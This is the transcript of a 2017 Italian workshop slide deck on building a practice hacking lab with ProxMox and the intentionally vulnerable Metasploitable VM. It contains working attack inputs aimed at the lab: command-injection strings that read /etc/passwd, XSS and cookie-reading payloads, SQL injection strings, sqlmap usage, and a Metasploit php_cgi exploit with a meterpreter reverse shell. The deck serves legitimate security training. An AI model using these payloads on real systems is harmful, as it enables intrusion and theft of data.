SlideShare une entreprise Scribd logo
1  sur  36
Télécharger pour lire hors ligne
Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
HACKING LAB
con ProxMox e Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
$ whoami
Phishing Analysis and Contrast @ D3Lab
Team Member @ BackBox Linux
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Hacking Lab
Un laboratorio nella propria infrastruttura di rete per allenarsi
in assoluta legalità sulle tecniche sfruttate nel Hacking.
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
ProxMox
Proxmox VE is a complete open source server virtualization
management software. It is based on KVM virtualization and
container-based virtualization and manages KVM virtual
machines, Linux containers (LXC), storage, virtualized
networks, and HA clusters
www.proxmox.com
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Metasploitable
Metasploitable is an intentionally vulnerable Linux virtual
machine. This VM can be used to conduct security training,
test security tools, and practice common penetration testing
techniques.
https://sourceforge.net/projects/metasploitable/
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
BackBox is a penetration test and security assessment
oriented Ubuntu-based Linux distribution providing a network
and informatic systems analysis toolkit. BackBox desktop
environment includes a complete set of tools required for
ethical hacking and security testing.
BackBox Linux
backbox.org
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
Creiamo una nuova Macchina Virtuale dal Pannello Web
Ricordatevelo
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
$ ssh root@IP_PROXMOX
# cd /var/lib/vz/images

# mkdir 102 (ID del VM che abbiamo prima creato)
# cd 102

# wget http://bit.ly/metasploitable -O metasploitable.zip

# unzip metasploitable.zip
# cd Metasploitable2-Linux/
# mv Metasploitable.vmdk ../
# rm metasploitable.zip ./Metasploitable2-Linux/ -rf
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
# qemu-img convert -f vmdk Metasploitable.vmdk -O qcow2
…Metasploitable.qcow2
# nano /etc/pve/qemu-server/102.conf
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
bootdisk: ide0
ide0: file=local:102/Metasploitable.qcow2,size=8G
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
Avviamo la VM
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Virtualizziamo Metasploitable
https://youtu.be/WBsCOjRQKnI
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: nmap
$ nmap 192.168.x.x
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 192.168.2.128
Host is up (0.0071s latency).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: nmap
$ sudo nmap -o 192.168.x.x
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 192.168.2.128
Host is up (0.0071s latency).
Not shown: 977 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
…
…
…
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.24 - 2.6.25
Network Distance: 2 hops
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: Zenmap
$ sudo zenmap
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: Dirsearch
$ dirsearch -e php -u http://192.168.x.x
[22:30:01] 200 - 112KB - /doc/
[22:30:01] 302 - 0B - /dvwa/ -> login.php
[22:30:03] 200 - 891B - /index.php
[22:30:05] 200 - 24KB - /mutillidae/
[22:30:05] 200 - 4KB - /phpMyAdmin/
[22:30:06] 200 - 48KB - /phpinfo.php
[22:30:07] 403 - 300B - /server-status/
[22:30:08] 200 - 884B - /test/
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA
http://192.168.x.x/dvwa/ admin:password
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA Command Execution Low
192.168.2.1 ; cat /etc/passwd
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA Command Execution Medium
192.168.2.1 & cat /etc/passwd
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA XSS Reflected Low
<script>alert('Hello World')</script>
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA XSS Reflected Medium
<ScRiPt>alert('Hello World’)</script>
<script language="javascript">alert('Hello World’)</script>
<img src=x onerror="alert('Hello World')">
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA XSS Stored Low
<script>document.write(document.cookie)</script>
<iframe src=“http://www.makerstation.it/"></iframe>
<meta http-equiv="refresh" content="10; url=http://
www.makerstation.it/">
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA XSS Stored Medium
<ScRiPt>alert("Hello World 2")</script>
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA SQL Injection Low
' or '0'='0
' or '0'='0' union select null, version() #
' or '0'='0' union select null, database() #
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA SQL Injection Low and SQLMap
sqlmap -u "http://192.168.x.x/dvwa/vulnerabilities/sqli/" --
forms --cookie="security=low; PHPSESSID=xyz"
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: DVWA SQL Injection Medium
0 or 1=1
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: Whatweb
$ whatweb 192.168.x.x
[200] Apache[2.2.8], HTTPServer[Ubuntu Linux][Apache/2.2.8
(Ubuntu) DAV/2], IP[192.168.x.x], PHP[5.2.4-2ubuntu5.10],
Title[Metasploitable2 - Linux], WebDAV[2], X-Powered-
By[PHP/5.2.4-2ubuntu5.10]
$ nmap -sV --script=http-php-version 192.168.x.x
|_Version from header x-powered-by: PHP/5.2.4-2
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: Metasploit
$ sudo metasploit
# search CVE-2012-1823
# use exploit/multi/http/php_cgi_arg_injection
# show options
# set RHOST 192.168.x.x

# set PAYLOAD php/meterpreter/reverse_tcp
# exploit
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Lab: Armitage
>Andrea Draghetti - 23 Maggio 2017 - FabLab Bassa Romagna
Q&A
@AndreaDraghetti

Contenu connexe

Tendances

VLANs in the Linux Kernel
VLANs in the Linux KernelVLANs in the Linux Kernel
VLANs in the Linux KernelKernel TLV
 
Basic Linux Security
Basic Linux SecurityBasic Linux Security
Basic Linux Securitypankaj009
 
CentOS Linux Server Hardening
CentOS Linux Server HardeningCentOS Linux Server Hardening
CentOS Linux Server HardeningMyOwn Telco
 
Linux administration
Linux administrationLinux administration
Linux administrationYogesh Ks
 
The linux networking architecture
The linux networking architectureThe linux networking architecture
The linux networking architecturehugo lu
 
Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)Giovanni Bechis
 
Cisco Router and Switch Security Hardening Guide
Cisco Router and Switch Security Hardening GuideCisco Router and Switch Security Hardening Guide
Cisco Router and Switch Security Hardening GuideHarris Andrea
 
Openstack in 10 mins
Openstack in 10 minsOpenstack in 10 mins
Openstack in 10 minsDawood M.S
 
Canonical Ubuntu OpenStack Overview Presentation
Canonical Ubuntu OpenStack Overview PresentationCanonical Ubuntu OpenStack Overview Presentation
Canonical Ubuntu OpenStack Overview PresentationThe World Bank
 
Kvm and libvirt
Kvm and libvirtKvm and libvirt
Kvm and libvirtplarsen67
 
DevConf 2014 Kernel Networking Walkthrough
DevConf 2014   Kernel Networking WalkthroughDevConf 2014   Kernel Networking Walkthrough
DevConf 2014 Kernel Networking WalkthroughThomas Graf
 
Automation with ansible
Automation with ansibleAutomation with ansible
Automation with ansibleKhizer Naeem
 

Tendances (20)

CCNP Security-Firewall
CCNP Security-FirewallCCNP Security-Firewall
CCNP Security-Firewall
 
Linux introduction
Linux introductionLinux introduction
Linux introduction
 
VLANs in the Linux Kernel
VLANs in the Linux KernelVLANs in the Linux Kernel
VLANs in the Linux Kernel
 
Basic Linux Security
Basic Linux SecurityBasic Linux Security
Basic Linux Security
 
Nmap
NmapNmap
Nmap
 
CentOS Linux Server Hardening
CentOS Linux Server HardeningCentOS Linux Server Hardening
CentOS Linux Server Hardening
 
NMap
NMapNMap
NMap
 
Vyos clustering ipsec
Vyos clustering ipsecVyos clustering ipsec
Vyos clustering ipsec
 
Linux administration
Linux administrationLinux administration
Linux administration
 
The linux networking architecture
The linux networking architectureThe linux networking architecture
The linux networking architecture
 
Nginx
NginxNginx
Nginx
 
Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)Linux seccomp(2) vs OpenBSD pledge(2)
Linux seccomp(2) vs OpenBSD pledge(2)
 
Cisco Router and Switch Security Hardening Guide
Cisco Router and Switch Security Hardening GuideCisco Router and Switch Security Hardening Guide
Cisco Router and Switch Security Hardening Guide
 
Openstack in 10 mins
Openstack in 10 minsOpenstack in 10 mins
Openstack in 10 mins
 
Basic Linux Internals
Basic Linux InternalsBasic Linux Internals
Basic Linux Internals
 
Canonical Ubuntu OpenStack Overview Presentation
Canonical Ubuntu OpenStack Overview PresentationCanonical Ubuntu OpenStack Overview Presentation
Canonical Ubuntu OpenStack Overview Presentation
 
Kvm and libvirt
Kvm and libvirtKvm and libvirt
Kvm and libvirt
 
kali linux.pptx
kali linux.pptxkali linux.pptx
kali linux.pptx
 
DevConf 2014 Kernel Networking Walkthrough
DevConf 2014   Kernel Networking WalkthroughDevConf 2014   Kernel Networking Walkthrough
DevConf 2014 Kernel Networking Walkthrough
 
Automation with ansible
Automation with ansibleAutomation with ansible
Automation with ansible
 

Similaire à Hacking Lab con ProxMox e Metasploitable

Aligning Continuous Integration Deployment: Automated Validation of OpenStack...
Aligning Continuous Integration Deployment: Automated Validation of OpenStack...Aligning Continuous Integration Deployment: Automated Validation of OpenStack...
Aligning Continuous Integration Deployment: Automated Validation of OpenStack...Atlassian
 
How to see the event and audit logs through ( gui and cli) in cluster ontap n...
How to see the event and audit logs through ( gui and cli) in cluster ontap n...How to see the event and audit logs through ( gui and cli) in cluster ontap n...
How to see the event and audit logs through ( gui and cli) in cluster ontap n...Saroj Sahu
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsChris Gates
 
Building and deploying a distributed application with Docker, Mesos and Marathon
Building and deploying a distributed application with Docker, Mesos and MarathonBuilding and deploying a distributed application with Docker, Mesos and Marathon
Building and deploying a distributed application with Docker, Mesos and MarathonJulia Mateo
 
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016Zabbix
 
NSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNoSuchCon
 
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdfPentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdffaker1842002
 
Sandboxing WebKitGTK (GUADEC 2019)
Sandboxing WebKitGTK (GUADEC 2019)Sandboxing WebKitGTK (GUADEC 2019)
Sandboxing WebKitGTK (GUADEC 2019)Igalia
 
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...Tokyo University of Science
 
Python And My Sq Ldb Module
Python And My Sq Ldb ModulePython And My Sq Ldb Module
Python And My Sq Ldb ModuleAkramWaseem
 
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with Uciprov
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with UciprovLukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with Uciprov
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with UciprovZabbix
 
Great Hiroshima with Python 170830
Great Hiroshima with Python 170830Great Hiroshima with Python 170830
Great Hiroshima with Python 170830Takuya Nishimoto
 
What's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
What's New in Docker 1.12 by Mike Goelzer and Andrea LuzzardiWhat's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
What's New in Docker 1.12 by Mike Goelzer and Andrea LuzzardiDocker, Inc.
 
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea LuzzardiWhat's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea LuzzardiMike Goelzer
 
Lightweight APIs in mRuby
Lightweight APIs in mRubyLightweight APIs in mRuby
Lightweight APIs in mRubyPivorak MeetUp
 
Velocity London - Chaos Engineering Bootcamp
Velocity London - Chaos Engineering Bootcamp Velocity London - Chaos Engineering Bootcamp
Velocity London - Chaos Engineering Bootcamp Ana Medina
 
Data Hiding Techniques
Data Hiding TechniquesData Hiding Techniques
Data Hiding Techniquesprashant3535
 
MySQL Proxy. From Architecture to Implementation
MySQL Proxy. From Architecture to ImplementationMySQL Proxy. From Architecture to Implementation
MySQL Proxy. From Architecture to ImplementationRonald Bradford
 

Similaire à Hacking Lab con ProxMox e Metasploitable (20)

Mininet Basics
Mininet BasicsMininet Basics
Mininet Basics
 
Aligning Continuous Integration Deployment: Automated Validation of OpenStack...
Aligning Continuous Integration Deployment: Automated Validation of OpenStack...Aligning Continuous Integration Deployment: Automated Validation of OpenStack...
Aligning Continuous Integration Deployment: Automated Validation of OpenStack...
 
How to see the event and audit logs through ( gui and cli) in cluster ontap n...
How to see the event and audit logs through ( gui and cli) in cluster ontap n...How to see the event and audit logs through ( gui and cli) in cluster ontap n...
How to see the event and audit logs through ( gui and cli) in cluster ontap n...
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 
Building and deploying a distributed application with Docker, Mesos and Marathon
Building and deploying a distributed application with Docker, Mesos and MarathonBuilding and deploying a distributed application with Docker, Mesos and Marathon
Building and deploying a distributed application with Docker, Mesos and Marathon
 
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016
Erik Skytthe - Monitoring Mesos, Docker, Containers with Zabbix | ZabConf2016
 
NSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNSC #2 - Challenge Solution
NSC #2 - Challenge Solution
 
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdfPentesting111111 Cheat Sheet_OSCP_2023.pdf
Pentesting111111 Cheat Sheet_OSCP_2023.pdf
 
Sandboxing WebKitGTK (GUADEC 2019)
Sandboxing WebKitGTK (GUADEC 2019)Sandboxing WebKitGTK (GUADEC 2019)
Sandboxing WebKitGTK (GUADEC 2019)
 
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...
NiceCover: A Serverless Webapp for Crowdsourcing Data Extraction and Knowledg...
 
Python And My Sq Ldb Module
Python And My Sq Ldb ModulePython And My Sq Ldb Module
Python And My Sq Ldb Module
 
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with Uciprov
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with UciprovLukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with Uciprov
Lukas Macura - Employing Zabbix to monitor OpenWrt (Beesip) devices with Uciprov
 
Great Hiroshima with Python 170830
Great Hiroshima with Python 170830Great Hiroshima with Python 170830
Great Hiroshima with Python 170830
 
What's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
What's New in Docker 1.12 by Mike Goelzer and Andrea LuzzardiWhat's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
What's New in Docker 1.12 by Mike Goelzer and Andrea Luzzardi
 
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea LuzzardiWhat's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
What's New in Docker 1.12 (June 20, 2016) by Mike Goelzer & Andrea Luzzardi
 
Lightweight APIs in mRuby
Lightweight APIs in mRubyLightweight APIs in mRuby
Lightweight APIs in mRuby
 
Velocity London - Chaos Engineering Bootcamp
Velocity London - Chaos Engineering Bootcamp Velocity London - Chaos Engineering Bootcamp
Velocity London - Chaos Engineering Bootcamp
 
Data Hiding Techniques
Data Hiding TechniquesData Hiding Techniques
Data Hiding Techniques
 
DDEV - Extended
DDEV - ExtendedDDEV - Extended
DDEV - Extended
 
MySQL Proxy. From Architecture to Implementation
MySQL Proxy. From Architecture to ImplementationMySQL Proxy. From Architecture to Implementation
MySQL Proxy. From Architecture to Implementation
 

Plus de Andrea Draghetti

Frodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisureFrodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisureAndrea Draghetti
 
Phishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzionePhishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzioneAndrea Draghetti
 
Gophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishingGophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishingAndrea Draghetti
 
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!Andrea Draghetti
 
Let’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklistsLet’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklistsAndrea Draghetti
 
Cyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusioneCyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusioneAndrea Draghetti
 
NFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaNFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaAndrea Draghetti
 
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitariPi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitariAndrea Draghetti
 
Errori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativoErrori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativoAndrea Draghetti
 
Phishing: One Shot Many Victims
Phishing: One Shot Many VictimsPhishing: One Shot Many Victims
Phishing: One Shot Many VictimsAndrea Draghetti
 
Phishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisurePhishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisureAndrea Draghetti
 
Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016Andrea Draghetti
 
BackBox Linux: Simulazione di un Penetration Test e CTF
BackBox Linux: Simulazione di un Penetration Test e CTFBackBox Linux: Simulazione di un Penetration Test e CTF
BackBox Linux: Simulazione di un Penetration Test e CTFAndrea Draghetti
 
BackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration TestBackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration TestAndrea Draghetti
 
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...Andrea Draghetti
 
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshockBackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshockAndrea Draghetti
 
BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!Andrea Draghetti
 
BackBox: WiFi Libero? Ti spio!
BackBox: WiFi Libero? Ti spio!BackBox: WiFi Libero? Ti spio!
BackBox: WiFi Libero? Ti spio!Andrea Draghetti
 
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFiLinux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFiAndrea Draghetti
 

Plus de Andrea Draghetti (19)

Frodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisureFrodi online: Analisi, simulazione e contromisure
Frodi online: Analisi, simulazione e contromisure
 
Phishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzionePhishing: tecniche e strategie di un fenomeno in evoluzione
Phishing: tecniche e strategie di un fenomeno in evoluzione
 
Gophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishingGophish: Simuliamo una campagna di phishing
Gophish: Simuliamo una campagna di phishing
 
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
Linux Day Orvieto: Analisi di una email, identifichiamo una minaccia!
 
Let’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklistsLet’s spread Phishing and escape the blocklists
Let’s spread Phishing and escape the blocklists
 
Cyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusioneCyber War: L’antivirus è un illusione
Cyber War: L’antivirus è un illusione
 
NFC: Tecnologia e Sicurezza
NFC: Tecnologia e SicurezzaNFC: Tecnologia e Sicurezza
NFC: Tecnologia e Sicurezza
 
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitariPi-Hole limitiamo la tracciabilità degli annunci pubblicitari
Pi-Hole limitiamo la tracciabilità degli annunci pubblicitari
 
Errori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativoErrori informatici da non commettere nel mondo lavorativo
Errori informatici da non commettere nel mondo lavorativo
 
Phishing: One Shot Many Victims
Phishing: One Shot Many VictimsPhishing: One Shot Many Victims
Phishing: One Shot Many Victims
 
Phishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e ContromisurePhishing - Analisi, Simulazione e Contromisure
Phishing - Analisi, Simulazione e Contromisure
 
Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016Coding for Hackers - Linux Day 2016
Coding for Hackers - Linux Day 2016
 
BackBox Linux: Simulazione di un Penetration Test e CTF
BackBox Linux: Simulazione di un Penetration Test e CTFBackBox Linux: Simulazione di un Penetration Test e CTF
BackBox Linux: Simulazione di un Penetration Test e CTF
 
BackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration TestBackBox Linux: Simulazione di un Penetration Test
BackBox Linux: Simulazione di un Penetration Test
 
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
 
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshockBackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
BackBox Linux e Metasploit: Una dimostrazione pratica del shellshock
 
BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!BackBox Linux e SET: Scopriamo il Phishing!
BackBox Linux e SET: Scopriamo il Phishing!
 
BackBox: WiFi Libero? Ti spio!
BackBox: WiFi Libero? Ti spio!BackBox: WiFi Libero? Ti spio!
BackBox: WiFi Libero? Ti spio!
 
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFiLinux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
Linux Day 2013 - Attacchi informatici a Smartphone e Tablet via WiFi
 

Dernier

GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
